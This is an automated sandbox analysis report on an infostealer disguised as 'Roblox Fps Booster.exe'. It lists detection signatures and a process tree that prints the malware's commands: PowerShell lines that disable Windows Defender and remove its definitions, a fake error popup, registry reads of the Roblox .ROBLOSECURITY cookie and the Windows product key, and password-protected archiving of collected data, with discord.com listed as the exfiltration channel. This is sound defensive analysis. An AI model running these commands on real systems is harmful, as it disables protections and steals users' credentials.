90389b1321fcdedae977e85e100acb4a3e456d7397b8c88b547398985fecbd59

Resubmissions

19/01/2025, 06:53

250119-hnwdnsypey 10

19/01/2025, 06:49

250119-hltgasypbv 10

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
19/01/2025, 06:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Roblox Fps Booster.exe
Size

7.6MB
MD5

872fced4073a2f384d0e876c79c0cd1a
SHA1

6298717ba59a61a2fd655d7992035038cd135b2a
SHA256

90389b1321fcdedae977e85e100acb4a3e456d7397b8c88b547398985fecbd59
SHA512

8abc3fd97decb64863b00a8184f02e12e53d90a54fa75f346d278fe659008fad914d5627aa4db4be3cdd428cae22dc6727fb8f6e89b4b2e6ed394670b3244079
SSDEEP

196608:AUD+kdLlwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWH:J5gIHL7HmBYXrYoaUNY

Score

8^/10

collection discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2332	powershell.exe
1084	powershell.exe
4288	powershell.exe
1476	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2716	cmd.exe
600	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4052	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe
4152	Roblox Fps Booster.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
14	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4864	tasklist.exe
460	tasklist.exe
3048	tasklist.exe
3184	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aaa3-21.dat	upx
behavioral1/memory/4152-25-0x00007FF980050000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/files/0x001900000002aa96-27.dat	upx
behavioral1/files/0x001900000002aaa1-29.dat	upx
behavioral1/memory/4152-32-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp	upx
behavioral1/memory/4152-31-0x00007FF989FF0000-0x00007FF98A017000-memory.dmp	upx
behavioral1/files/0x001900000002aaa0-34.dat	upx
behavioral1/files/0x001900000002aa9d-48.dat	upx
behavioral1/files/0x004600000002aa9c-47.dat	upx
behavioral1/files/0x001900000002aa9b-46.dat	upx
behavioral1/files/0x001900000002aa9a-45.dat	upx
behavioral1/files/0x001900000002aa99-44.dat	upx
behavioral1/files/0x001900000002aa98-43.dat	upx
behavioral1/files/0x001900000002aa97-42.dat	upx
behavioral1/files/0x001b00000002aa95-41.dat	upx
behavioral1/files/0x001900000002aaa8-40.dat	upx
behavioral1/files/0x001900000002aaa7-39.dat	upx
behavioral1/files/0x001900000002aaa6-38.dat	upx
behavioral1/files/0x001900000002aaa2-35.dat	upx
behavioral1/memory/4152-54-0x00007FF984B80000-0x00007FF984BAB000-memory.dmp	upx
behavioral1/memory/4152-56-0x00007FF985A50000-0x00007FF985A69000-memory.dmp	upx
behavioral1/memory/4152-58-0x00007FF984310000-0x00007FF984335000-memory.dmp	upx
behavioral1/memory/4152-60-0x00007FF980910000-0x00007FF980A8F000-memory.dmp	upx
behavioral1/memory/4152-64-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp	upx
behavioral1/memory/4152-62-0x00007FF985990000-0x00007FF9859A9000-memory.dmp	upx
behavioral1/memory/4152-66-0x00007FF9842D0000-0x00007FF984303000-memory.dmp	upx
behavioral1/memory/4152-74-0x00007FF979680000-0x00007FF979BB3000-memory.dmp	upx
behavioral1/memory/4152-72-0x00007FF980AC0000-0x00007FF980B8E000-memory.dmp	upx
behavioral1/memory/4152-71-0x00007FF989FF0000-0x00007FF98A017000-memory.dmp	upx
behavioral1/memory/4152-70-0x00007FF980050000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4152-79-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp	upx
behavioral1/memory/4152-81-0x00007FF97FF90000-0x00007FF980043000-memory.dmp	upx
behavioral1/memory/4152-78-0x00007FF984B80000-0x00007FF984BAB000-memory.dmp	upx
behavioral1/memory/4152-76-0x00007FF984AF0000-0x00007FF984B04000-memory.dmp	upx
behavioral1/memory/4152-105-0x00007FF984310000-0x00007FF984335000-memory.dmp	upx
behavioral1/memory/4152-106-0x00007FF980910000-0x00007FF980A8F000-memory.dmp	upx
behavioral1/memory/4152-230-0x00007FF9842D0000-0x00007FF984303000-memory.dmp	upx
behavioral1/memory/4152-252-0x00007FF980AC0000-0x00007FF980B8E000-memory.dmp	upx
behavioral1/memory/4152-267-0x00007FF979680000-0x00007FF979BB3000-memory.dmp	upx
behavioral1/memory/4152-392-0x00007FF980050000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4152-398-0x00007FF980910000-0x00007FF980A8F000-memory.dmp	upx
behavioral1/memory/4152-699-0x00007FF980050000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4152-713-0x00007FF97FF90000-0x00007FF980043000-memory.dmp	upx
behavioral1/memory/4152-724-0x00007FF980AC0000-0x00007FF980B8E000-memory.dmp	upx
behavioral1/memory/4152-723-0x00007FF9842D0000-0x00007FF984303000-memory.dmp	upx
behavioral1/memory/4152-722-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp	upx
behavioral1/memory/4152-721-0x00007FF985990000-0x00007FF9859A9000-memory.dmp	upx
behavioral1/memory/4152-720-0x00007FF980910000-0x00007FF980A8F000-memory.dmp	upx
behavioral1/memory/4152-719-0x00007FF984310000-0x00007FF984335000-memory.dmp	upx
behavioral1/memory/4152-718-0x00007FF985A50000-0x00007FF985A69000-memory.dmp	upx
behavioral1/memory/4152-717-0x00007FF984B80000-0x00007FF984BAB000-memory.dmp	upx
behavioral1/memory/4152-716-0x00007FF989FF0000-0x00007FF98A017000-memory.dmp	upx
behavioral1/memory/4152-715-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp	upx
behavioral1/memory/4152-714-0x00007FF979680000-0x00007FF979BB3000-memory.dmp	upx
behavioral1/memory/4152-712-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp	upx
behavioral1/memory/4152-711-0x00007FF984AF0000-0x00007FF984B04000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2552	WMIC.exe
4520	WMIC.exe
3228	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3084	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133817430348254596"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2332	powershell.exe
1084	powershell.exe
2332	powershell.exe
1084	powershell.exe
600	powershell.exe
600	powershell.exe
4288	powershell.exe
4288	powershell.exe
2848	powershell.exe
2848	powershell.exe
4308	chrome.exe
4308	chrome.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
3612	powershell.exe
3612	powershell.exe
4724	chrome.exe
4724	chrome.exe
4724	chrome.exe
4724	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	460	tasklist.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeIncreaseQuotaPrivilege	3724	WMIC.exe
Token: SeSecurityPrivilege	3724	WMIC.exe
Token: SeTakeOwnershipPrivilege	3724	WMIC.exe
Token: SeLoadDriverPrivilege	3724	WMIC.exe
Token: SeSystemProfilePrivilege	3724	WMIC.exe
Token: SeSystemtimePrivilege	3724	WMIC.exe
Token: SeProfSingleProcessPrivilege	3724	WMIC.exe
Token: SeIncBasePriorityPrivilege	3724	WMIC.exe
Token: SeCreatePagefilePrivilege	3724	WMIC.exe
Token: SeBackupPrivilege	3724	WMIC.exe
Token: SeRestorePrivilege	3724	WMIC.exe
Token: SeShutdownPrivilege	3724	WMIC.exe
Token: SeDebugPrivilege	3724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3724	WMIC.exe
Token: SeRemoteShutdownPrivilege	3724	WMIC.exe
Token: SeUndockPrivilege	3724	WMIC.exe
Token: SeManageVolumePrivilege	3724	WMIC.exe
Token: 33	3724	WMIC.exe
Token: 34	3724	WMIC.exe
Token: 35	3724	WMIC.exe
Token: 36	3724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3724	WMIC.exe
Token: SeSecurityPrivilege	3724	WMIC.exe
Token: SeTakeOwnershipPrivilege	3724	WMIC.exe
Token: SeLoadDriverPrivilege	3724	WMIC.exe
Token: SeSystemProfilePrivilege	3724	WMIC.exe
Token: SeSystemtimePrivilege	3724	WMIC.exe
Token: SeProfSingleProcessPrivilege	3724	WMIC.exe
Token: SeIncBasePriorityPrivilege	3724	WMIC.exe
Token: SeCreatePagefilePrivilege	3724	WMIC.exe
Token: SeBackupPrivilege	3724	WMIC.exe
Token: SeRestorePrivilege	3724	WMIC.exe
Token: SeShutdownPrivilege	3724	WMIC.exe
Token: SeDebugPrivilege	3724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3724	WMIC.exe
Token: SeRemoteShutdownPrivilege	3724	WMIC.exe
Token: SeUndockPrivilege	3724	WMIC.exe
Token: SeManageVolumePrivilege	3724	WMIC.exe
Token: 33	3724	WMIC.exe
Token: 34	3724	WMIC.exe
Token: 35	3724	WMIC.exe
Token: 36	3724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4520	WMIC.exe
Token: SeSecurityPrivilege	4520	WMIC.exe
Token: SeTakeOwnershipPrivilege	4520	WMIC.exe
Token: SeLoadDriverPrivilege	4520	WMIC.exe
Token: SeSystemProfilePrivilege	4520	WMIC.exe
Token: SeSystemtimePrivilege	4520	WMIC.exe
Token: SeProfSingleProcessPrivilege	4520	WMIC.exe
Token: SeIncBasePriorityPrivilege	4520	WMIC.exe
Token: SeCreatePagefilePrivilege	4520	WMIC.exe
Token: SeBackupPrivilege	4520	WMIC.exe
Token: SeRestorePrivilege	4520	WMIC.exe
Token: SeShutdownPrivilege	4520	WMIC.exe
Token: SeDebugPrivilege	4520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4520	WMIC.exe
Token: SeRemoteShutdownPrivilege	4520	WMIC.exe
Token: SeUndockPrivilege	4520	WMIC.exe
Token: SeManageVolumePrivilege	4520	WMIC.exe
Token: 33	4520	WMIC.exe
Token: 34	4520	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe
4308	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3492 wrote to memory of 4152	3492	Roblox Fps Booster.exe	77
PID 3492 wrote to memory of 4152	3492	Roblox Fps Booster.exe	77
PID 4152 wrote to memory of 2400	4152	Roblox Fps Booster.exe	78
PID 4152 wrote to memory of 2400	4152	Roblox Fps Booster.exe	78
PID 4152 wrote to memory of 3696	4152	Roblox Fps Booster.exe	79
PID 4152 wrote to memory of 3696	4152	Roblox Fps Booster.exe	79
PID 4152 wrote to memory of 2572	4152	Roblox Fps Booster.exe	80
PID 4152 wrote to memory of 2572	4152	Roblox Fps Booster.exe	80
PID 4152 wrote to memory of 4672	4152	Roblox Fps Booster.exe	83
PID 4152 wrote to memory of 4672	4152	Roblox Fps Booster.exe	83
PID 4152 wrote to memory of 2252	4152	Roblox Fps Booster.exe	86
PID 4152 wrote to memory of 2252	4152	Roblox Fps Booster.exe	86
PID 4672 wrote to memory of 460	4672	cmd.exe	88
PID 4672 wrote to memory of 460	4672	cmd.exe	88
PID 2400 wrote to memory of 2332	2400	cmd.exe	89
PID 2400 wrote to memory of 2332	2400	cmd.exe	89
PID 3696 wrote to memory of 1084	3696	cmd.exe	90
PID 3696 wrote to memory of 1084	3696	cmd.exe	90
PID 2572 wrote to memory of 1544	2572	cmd.exe	91
PID 2572 wrote to memory of 1544	2572	cmd.exe	91
PID 2252 wrote to memory of 3724	2252	cmd.exe	93
PID 2252 wrote to memory of 3724	2252	cmd.exe	93
PID 4152 wrote to memory of 3400	4152	Roblox Fps Booster.exe	94
PID 4152 wrote to memory of 3400	4152	Roblox Fps Booster.exe	94
PID 3400 wrote to memory of 4456	3400	cmd.exe	96
PID 3400 wrote to memory of 4456	3400	cmd.exe	96
PID 4152 wrote to memory of 1196	4152	Roblox Fps Booster.exe	97
PID 4152 wrote to memory of 1196	4152	Roblox Fps Booster.exe	97
PID 1196 wrote to memory of 4656	1196	cmd.exe	99
PID 1196 wrote to memory of 4656	1196	cmd.exe	99
PID 4152 wrote to memory of 3172	4152	Roblox Fps Booster.exe	100
PID 4152 wrote to memory of 3172	4152	Roblox Fps Booster.exe	100
PID 3172 wrote to memory of 4520	3172	cmd.exe	102
PID 3172 wrote to memory of 4520	3172	cmd.exe	102
PID 4152 wrote to memory of 3556	4152	Roblox Fps Booster.exe	103
PID 4152 wrote to memory of 3556	4152	Roblox Fps Booster.exe	103
PID 3556 wrote to memory of 3228	3556	cmd.exe	105
PID 3556 wrote to memory of 3228	3556	cmd.exe	105
PID 4152 wrote to memory of 3292	4152	Roblox Fps Booster.exe	106
PID 4152 wrote to memory of 3292	4152	Roblox Fps Booster.exe	106
PID 4152 wrote to memory of 3224	4152	Roblox Fps Booster.exe	107
PID 4152 wrote to memory of 3224	4152	Roblox Fps Booster.exe	107
PID 4152 wrote to memory of 4348	4152	Roblox Fps Booster.exe	110
PID 4152 wrote to memory of 4348	4152	Roblox Fps Booster.exe	110
PID 4152 wrote to memory of 2716	4152	Roblox Fps Booster.exe	111
PID 4152 wrote to memory of 2716	4152	Roblox Fps Booster.exe	111
PID 4152 wrote to memory of 480	4152	Roblox Fps Booster.exe	113
PID 4152 wrote to memory of 480	4152	Roblox Fps Booster.exe	113
PID 4152 wrote to memory of 3548	4152	Roblox Fps Booster.exe	114
PID 4152 wrote to memory of 3548	4152	Roblox Fps Booster.exe	114
PID 4152 wrote to memory of 3092	4152	Roblox Fps Booster.exe	115
PID 4152 wrote to memory of 3092	4152	Roblox Fps Booster.exe	115
PID 3224 wrote to memory of 3048	3224	cmd.exe	120
PID 3224 wrote to memory of 3048	3224	cmd.exe	120
PID 3292 wrote to memory of 3184	3292	cmd.exe	121
PID 3292 wrote to memory of 3184	3292	cmd.exe	121
PID 4348 wrote to memory of 2316	4348	cmd.exe	122
PID 4348 wrote to memory of 2316	4348	cmd.exe	122
PID 480 wrote to memory of 4864	480	cmd.exe	123
PID 480 wrote to memory of 4864	480	cmd.exe	123
PID 2716 wrote to memory of 600	2716	cmd.exe	124
PID 2716 wrote to memory of 600	2716	cmd.exe	124
PID 3092 wrote to memory of 3084	3092	cmd.exe	125
PID 3092 wrote to memory of 3084	3092	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe
"C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe
  "C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Roblox Fps Booster.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('fps unlocker did not run due to file error try redownloading', 0, 'fps unlocker did not run', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('fps unlocker did not run due to file error try redownloading', 0, 'fps unlocker did not run', 0+16);close()"
      4⤵
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:480
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3548
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3092
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4224
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2788
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:244
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1112
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4420
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"sadasda" "C:\Users\Admin\AppData\Local\Temp\Pjyuj.zip" *"
    3⤵
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"sadasda" "C:\Users\Admin\AppData\Local\Temp\Pjyuj.zip" *
      4⤵
      Executes dropped EXE
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
